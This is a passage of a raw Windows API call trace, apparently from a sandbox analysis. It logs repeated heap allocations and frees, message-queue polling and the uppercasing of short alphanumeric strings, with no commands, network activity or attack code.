RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.490] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.491] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.492] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.493] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.494] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0206.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.495] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.495] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.496] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.496] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.496] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.496] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.497] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.497] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.498] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.499] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.499] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.499] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.500] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.500] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.501] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.501] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.502] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.502] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.502] RtlAllocateHeap 